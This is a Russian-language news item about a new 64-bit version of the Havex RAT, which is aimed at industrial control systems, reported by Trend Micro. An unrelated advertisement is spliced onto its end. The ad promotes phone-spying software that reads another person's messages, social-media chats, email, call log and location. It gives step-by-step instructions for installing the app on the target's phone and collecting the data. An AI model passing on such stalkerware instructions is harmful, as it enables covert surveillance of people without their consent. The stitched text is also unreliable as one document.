Обнаружена новая версия вредоносного ПО Havex RAT

2a99fb0591aa8c98609a0e71703831ceПрограмма Havex стала активно использоваться для атак автоматизированных систем управления, которые применяются на производстве. Злоумышленники предпочитают именно это вредоносное ПО, поскольку его легко замаскировать, настраивать под конкретные нужны, перепрошивать настройки ядра под определённые требования.

Аналитики компании Trend Micro сообщили о появлении x64-версии данного трояна. Совершенно очевидно, что основное поле деятельности развернётся на системах с аналогичным ядром, особенно на Windows 7 x64. Уже сейчас можно утверждать, что многочисленные автоматизированные системы находятся под угрозой, если их администраторы не будут своевременно инсталлировать обновления безопасности.

Одним из ключевых компонентов Havex является файл-библиотека TMPpovider023.dll (BKDR64_HAVEX.A), который используется для запуска вредоносного программного кода на серверах С&C. В данном случае, цифра 23 указывает на текущую версию файла. Компиляция библиотеки происходила в конце 2012 года, однако активная фаза её действия начинается лишь сейчас. Если посмотреть на версию Havex v029, то там присутствовал ещё 32-битный вариант, а 64-битный был выявлен лишь в декабре 2014.

Отличий между v023 и v029, кроме разрядности, практически не наблюдаются. Как отмечают эксперты, атаки поступают с разных IP-адресов, пока выявлено минимум четыре таких адреса. Поскольку в версиях используется идентичная инфраструктура, использование программ схоже. Поскольку злоумышленникам порой требуется конспирация файлов, для подписи используется поддельный цифровой сертификат от IBM. Как считают эксперты, владельцам и администраторам автоматизированных систем следует регулярно производить мониторинг трафика по протоколу HTTP. Так как общего между Havex и другими троянами под Windows очень много, вариантов скомпрометировать систему появляется масса. Несколько волн атак уже было, не исключается и повторная активность программ.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.